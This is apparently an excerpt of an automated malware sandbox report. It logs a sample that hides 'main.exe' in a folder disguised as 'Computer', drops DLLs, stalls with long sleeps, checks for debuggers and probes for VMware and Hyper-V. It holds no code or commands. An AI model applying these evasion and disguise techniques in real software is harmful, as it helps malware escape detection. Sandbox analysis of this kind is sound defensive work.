Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,

23_2_00007FFE11BD7694

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE11506078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE11BDB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE11EC2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE126E3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE1A4F4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE1A521D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE11776078

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4822	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5045	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6319	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3372	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7904	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1638	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\ROF9A37w	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\TsG1eHIt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\bMZx4vGr	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\ogg99SMu	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\t291wOio	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\Cw0MZxef	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\eKTTDy2k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\6rRRlGVV	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\w3LkirgH	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_23-60660

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-11418

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

API coverage: 8.0 %

Source: C:\Users\user\Desktop\file.exe TID: 7160	Thread sleep time: -35760000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744	Thread sleep count: 4822 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428	Thread sleep count: 5045 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep count: 6319 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948	Thread sleep count: 3372 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620	Thread sleep count: 7904 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844	Thread sleep count: 1638 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7116	Thread sleep count: 46 > 30

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B933DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF64B933DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF7C1AB47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF7C1AB47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1150A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1150A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BD1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11BD1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11EC5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126E57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE126E57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A4F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1A4F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A522FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1A522FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1177A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE1177A083

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.31.dr	Binary or memory string: VMware
Source: Amcache.hve.31.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.31.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.31.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.31.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.31.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.31.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.31.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.31.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.31.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.31.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.31.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2334937494.000002B8FC2D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2277765517.00000157C4DCC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954686645.00000142D8248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000001.00000002.2953885741.0000000000B49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
Source: Amcache.hve.31.dr	Binary or memory string: vmci.sys
Source: main.exe, 00000017.00000002.2667296151.00000157C4DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: Amcache.hve.31.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.31.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.31.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.31.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.31.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.31.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.31.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.31.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.31.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.31.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.31.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.31.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.31.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.31.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.31.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.31.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

API call chain: ExitProcess graph end node

graph_23-58245

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B93FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

